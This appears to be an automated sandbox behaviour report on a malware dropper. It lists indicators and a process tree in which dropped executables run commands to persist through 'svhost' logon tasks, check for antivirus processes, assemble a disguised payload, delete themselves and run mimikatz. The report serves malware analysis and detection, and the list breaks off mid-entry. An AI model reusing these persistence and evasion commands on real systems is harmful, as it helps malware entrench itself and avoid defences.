Token: SeLoadDriverPrivilege	696	powershell.exe
Token: SeSystemProfilePrivilege	696	powershell.exe
Token: SeSystemtimePrivilege	696	powershell.exe
Token: SeProfSingleProcessPrivilege	696	powershell.exe
Token: SeIncBasePriorityPrivilege	696	powershell.exe
Token: SeCreatePagefilePrivilege	696	powershell.exe
Token: SeBackupPrivilege	696	powershell.exe
Token: SeRestorePrivilege	696	powershell.exe
Token: SeShutdownPrivilege	696	powershell.exe
Token: SeDebugPrivilege	696	powershell.exe
Token: SeSystemEnvironmentPrivilege	696	powershell.exe
Token: SeRemoteShutdownPrivilege	696	powershell.exe
Token: SeUndockPrivilege	696	powershell.exe
Token: SeManageVolumePrivilege	696	powershell.exe
Token: 33	696	powershell.exe
Token: 34	696	powershell.exe
Token: 35	696	powershell.exe
Token: 36	696	powershell.exe
Token: SeIncreaseQuotaPrivilege	696	powershell.exe
Token: SeSecurityPrivilege	696	powershell.exe
Token: SeTakeOwnershipPrivilege	696	powershell.exe
Token: SeLoadDriverPrivilege	696	powershell.exe
Token: SeSystemProfilePrivilege	696	powershell.exe
Token: SeSystemtimePrivilege	696	powershell.exe
Token: SeProfSingleProcessPrivilege	696	powershell.exe
Token: SeIncBasePriorityPrivilege	696	powershell.exe
Token: SeCreatePagefilePrivilege	696	powershell.exe
Token: SeBackupPrivilege	696	powershell.exe
Token: SeRestorePrivilege	696	powershell.exe
Token: SeShutdownPrivilege	696	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exedwm.exeRestructuring.pif

pid	Process
2708	7zFM.exe
2708	7zFM.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

dwm.exeRestructuring.pif

pid	Process
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe
3176	dwm.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

m.exeup.exepei.exePctOccurred.exe120131490.exeRestructuring.pifPerfWatson1.exetwztl.exePerfWatson1.exebuild11.exestub.exePerfWatson1.exePerfWatson1.exeRestructuring.pifmimikatz.exePerfWatson1.exe

pid	Process
2308	m.exe
2776	up.exe
2776	up.exe
5040	pei.exe
1940	PctOccurred.exe
4660	120131490.exe
3488	Restructuring.pif
5112	PerfWatson1.exe
1868	twztl.exe
1140	PerfWatson1.exe
2992	build11.exe
4824	stub.exe
3288	PerfWatson1.exe
2012	PerfWatson1.exe
5064	Restructuring.pif
5028	mimikatz.exe
4092	PerfWatson1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exem.exesysnldcvmr.exe1809827666.execmd.execmd.exe2420715866.exePURLOG.exewinupsecvmgr.exe

description	pid	Process	procid_target
PID 5012 wrote to memory of 2936	5012	4363463463464363463463463.exe	83
PID 5012 wrote to memory of 2936	5012	4363463463464363463463463.exe	83
PID 5012 wrote to memory of 2936	5012	4363463463464363463463463.exe	83
PID 5012 wrote to memory of 4444	5012	4363463463464363463463463.exe	85
PID 5012 wrote to memory of 4444	5012	4363463463464363463463463.exe	85
PID 5012 wrote to memory of 2308	5012	4363463463464363463463463.exe	86
PID 5012 wrote to memory of 2308	5012	4363463463464363463463463.exe	86
PID 5012 wrote to memory of 2308	5012	4363463463464363463463463.exe	86
PID 5012 wrote to memory of 3344	5012	4363463463464363463463463.exe	87
PID 5012 wrote to memory of 3344	5012	4363463463464363463463463.exe	87
PID 2308 wrote to memory of 3476	2308	m.exe	88
PID 2308 wrote to memory of 3476	2308	m.exe	88
PID 2308 wrote to memory of 3476	2308	m.exe	88
PID 5012 wrote to memory of 2776	5012	4363463463464363463463463.exe	89
PID 5012 wrote to memory of 2776	5012	4363463463464363463463463.exe	89
PID 5012 wrote to memory of 2776	5012	4363463463464363463463463.exe	89
PID 3476 wrote to memory of 3116	3476	sysnldcvmr.exe	90
PID 3476 wrote to memory of 3116	3476	sysnldcvmr.exe	90
PID 3116 wrote to memory of 1940	3116	1809827666.exe	91
PID 3116 wrote to memory of 1940	3116	1809827666.exe	91
PID 3116 wrote to memory of 1544	3116	1809827666.exe	93
PID 3116 wrote to memory of 1544	3116	1809827666.exe	93
PID 1940 wrote to memory of 4220	1940	cmd.exe	95
PID 1940 wrote to memory of 4220	1940	cmd.exe	95
PID 1544 wrote to memory of 4060	1544	cmd.exe	96
PID 1544 wrote to memory of 4060	1544	cmd.exe	96
PID 3476 wrote to memory of 2396	3476	sysnldcvmr.exe	97
PID 3476 wrote to memory of 2396	3476	sysnldcvmr.exe	97
PID 3476 wrote to memory of 2396	3476	sysnldcvmr.exe	97
PID 2396 wrote to memory of 1372	2396	2420715866.exe	98
PID 2396 wrote to memory of 1372	2396	2420715866.exe	98
PID 3476 wrote to memory of 4496	3476	sysnldcvmr.exe	99
PID 3476 wrote to memory of 4496	3476	sysnldcvmr.exe	99
PID 3476 wrote to memory of 4496	3476	sysnldcvmr.exe	99
PID 4444 wrote to memory of 3148	4444	PURLOG.exe	100
PID 4444 wrote to memory of 3148	4444	PURLOG.exe	100
PID 4444 wrote to memory of 700	4444	PURLOG.exe	101
PID 4444 wrote to memory of 700	4444	PURLOG.exe	101
PID 4444 wrote to memory of 1676	4444	PURLOG.exe	102
PID 4444 wrote to memory of 1676	4444	PURLOG.exe	102
PID 4444 wrote to memory of 784	4444	PURLOG.exe	103
PID 4444 wrote to memory of 784	4444	PURLOG.exe	103
PID 4444 wrote to memory of 1224	4444	PURLOG.exe	104
PID 4444 wrote to memory of 1224	4444	PURLOG.exe	104
PID 4444 wrote to memory of 2480	4444	PURLOG.exe	105
PID 4444 wrote to memory of 2480	4444	PURLOG.exe	105
PID 4444 wrote to memory of 3368	4444	PURLOG.exe	106
PID 4444 wrote to memory of 3368	4444	PURLOG.exe	106
PID 4444 wrote to memory of 3736	4444	PURLOG.exe	107
PID 4444 wrote to memory of 3736	4444	PURLOG.exe	107
PID 4444 wrote to memory of 3736	4444	PURLOG.exe	107
PID 4444 wrote to memory of 3736	4444	PURLOG.exe	107
PID 4444 wrote to memory of 3736	4444	PURLOG.exe	107
PID 4444 wrote to memory of 3736	4444	PURLOG.exe	107
PID 4444 wrote to memory of 3736	4444	PURLOG.exe	107
PID 4444 wrote to memory of 3004	4444	PURLOG.exe	108
PID 4444 wrote to memory of 3004	4444	PURLOG.exe	108
PID 3476 wrote to memory of 464	3476	sysnldcvmr.exe	117
PID 3476 wrote to memory of 464	3476	sysnldcvmr.exe	117
PID 3476 wrote to memory of 464	3476	sysnldcvmr.exe	117
PID 2028 wrote to memory of 2732	2028	winupsecvmgr.exe	121
PID 2028 wrote to memory of 3176	2028	winupsecvmgr.exe	122
PID 3476 wrote to memory of 652	3476	sysnldcvmr.exe	123
PID 3476 wrote to memory of 652	3476	sysnldcvmr.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
3144	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3332
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2708
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5012
- - C:\Users\Admin\Desktop\Files\ewrvuh.exe
    "C:\Users\Admin\Desktop\Files\ewrvuh.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2936
- - C:\Users\Admin\Desktop\Files\PURLOG.exe
    "C:\Users\Admin\Desktop\Files\PURLOG.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\Desktop\Files\PURLOG.exe' -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3004
- - C:\Users\Admin\Desktop\Files\m.exe
    "C:\Users\Admin\Desktop\Files\m.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3476
    - - C:\Users\Admin\AppData\Local\Temp\1809827666.exe
        
        C:\Users\Admin\AppData\Local\Temp\1809827666.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3116
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1940
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:4220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1544
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:4060
    - - C:\Users\Admin\AppData\Local\Temp\2420715866.exe
        
        C:\Users\Admin\AppData\Local\Temp\2420715866.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2396
      - C:\Users\Admin\AppData\Local\Temp\1622938899.exe
        
        C:\Users\Admin\AppData\Local\Temp\1622938899.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1372
    - - C:\Users\Admin\AppData\Local\Temp\164314122.exe
        
        C:\Users\Admin\AppData\Local\Temp\164314122.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4496
    - - C:\Users\Admin\AppData\Local\Temp\2603430756.exe
        
        C:\Users\Admin\AppData\Local\Temp\2603430756.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:464
    - - C:\Users\Admin\AppData\Local\Temp\1888623094.exe
        
        C:\Users\Admin\AppData\Local\Temp\1888623094.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:652
      - C:\Users\Admin\AppData\Local\Temp\1431716774.exe
        
        C:\Users\Admin\AppData\Local\Temp\1431716774.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4348
    - - C:\Users\Admin\AppData\Local\Temp\2641813856.exe
        
        C:\Users\Admin\AppData\Local\Temp\2641813856.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1140
      - C:\Users\Admin\sysnldcvmr.exe
        
        C:\Users\Admin\sysnldcvmr.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1064
        
        C:\Users\Admin\AppData\Local\Temp\2755424256.exe
        
        C:\Users\Admin\AppData\Local\Temp\2755424256.exe
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2756
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:3368
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:1596
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:1900
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\1716412561.exe
        
        C:\Users\Admin\AppData\Local\Temp\1716412561.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\386833483.exe
        
        C:\Users\Admin\AppData\Local\Temp\386833483.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\1259121635.exe
        
        C:\Users\Admin\AppData\Local\Temp\1259121635.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\1592010501.exe
        
        C:\Users\Admin\AppData\Local\Temp\1592010501.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1580
- - C:\Users\Admin\Desktop\Files\test16.exe
    "C:\Users\Admin\Desktop\Files\test16.exe"
    3⤵
    - Executes dropped EXE
    PID:3344
- - C:\Users\Admin\Desktop\Files\up.exe
    "C:\Users\Admin\Desktop\Files\up.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2776
- - C:\Users\Admin\Desktop\Files\pei.exe
    "C:\Users\Admin\Desktop\Files\pei.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5040
  - - C:\Users\Admin\AppData\Local\Temp\120131490.exe
      C:\Users\Admin\AppData\Local\Temp\120131490.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4660
- - C:\Users\Admin\Desktop\Files\PctOccurred.exe
    "C:\Users\Admin\Desktop\Files\PctOccurred.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1940
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:2844
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:4240
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4800
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1656
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2312
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 193997
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4948
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "JulieAppMagneticWhenever" Hist
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4968
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:388
    - - C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
        
        Restructuring.pif y
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3488
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1108
- - C:\Users\Admin\Desktop\Files\built.exe
    "C:\Users\Admin\Desktop\Files\built.exe"
    3⤵
    - Executes dropped EXE
    PID:1420
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3892
  - - C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
      "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
      4⤵
      Executes dropped EXE
      PID:2860
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AFtqGY9CJmsw.bat" "
        5⤵
        
        PID:1676
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:608
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3724
      - C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5112
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        7⤵
        
        PID:400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KH8E5zcj0SFv.bat" "
        7⤵
        
        PID:1864
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:3156
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1140
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        9⤵
        
        PID:1500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xFBWy8CFEcYS.bat" "
        9⤵
        
        PID:3080
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4832
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3288
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4dCnvsGHvDiU.bat" "
        11⤵
        
        PID:1904
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:4240
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1420
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2012
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tL6XnagKaIgV.bat" "
        13⤵
        
        PID:228
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:232
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1252
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        14⤵
        Executes dropped EXE
        
        PID:4304
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        15⤵
        
        PID:2308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BKgyAACbrJA.bat" "
        15⤵
        
        PID:888
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2204
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        Runs ping.exe
        
        PID:3008
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        16⤵
        Executes dropped EXE
        
        PID:3112
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        17⤵
        
        PID:4900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CA5zFxSvwcz3.bat" "
        17⤵
        
        PID:1112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:560
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5024
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        18⤵
        Executes dropped EXE
        
        PID:240
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KpJaritWY7Wn.bat" "
        19⤵
        
        PID:1316
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:4032
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1388
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        20⤵
        Executes dropped EXE
        
        PID:5096
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        21⤵
        
        PID:1772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Z6r9qEeCxRa3.bat" "
        21⤵
        
        PID:1944
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:2800
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3604
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        22⤵
        Executes dropped EXE
        
        PID:1964
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aViE447TG4FZ.bat" "
        23⤵
        
        PID:3156
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:3148
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3844
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        24⤵
        Executes dropped EXE
        
        PID:1544
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YyhvHPvCwEdk.bat" "
        25⤵
        
        PID:1104
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:4896
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
